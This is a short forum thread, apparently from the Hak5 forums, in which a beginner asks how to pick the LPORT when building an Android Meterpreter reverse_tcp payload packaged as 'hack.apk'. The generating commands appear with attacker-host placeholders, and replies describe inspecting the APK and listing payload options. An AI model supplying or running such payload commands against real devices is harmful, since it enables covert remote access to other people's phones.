Jump to content

Help with Metasploit payload creation[kali linux]


Kalikid
 Share

Recommended Posts

Hello,
First off I would like to say hi hak5 forums, love the show and couldnt register with kali's forum so i came here because I would like to educate myself, or be educated by others on some aspects of metasploit/kali

To put it in the simplest terms,
I was creating a payload for android, and I was wondering, how do i know what LPORT to use.
for my first try i tried 446
with the following command :


msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apk

and it returned an error that i cant specify exactly(because i dont remember)
but to paraphrase it was something along the lines of :


invalid LPORT option

than i switched it too

msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apk

and for some reason that i cant understand port 443 worked.

so back to my question....
How do i know what LPORT to use when creating a payload?


msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf
Link to comment
Share on other sites

  • 4 months later...

just a side note, if you do a

$ cp hack.apk hack.apk.zip
$ unzip hack.apk.zip
you can see the files that are created. I think if I remember correctly, port number is just a value in an xml entry. I haven't really messed around with it, but it appears easy to change manually.

Also, you can try

$ msfpayload android/meterpreter/reverse_tcp S
to get more information on a payload Edited by fugu
Link to comment
Share on other sites

The 'unzip' command (as any command on UNIX) doesn't give a shit about the extension of a filename, so you could simply run

unzip hack.apk
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...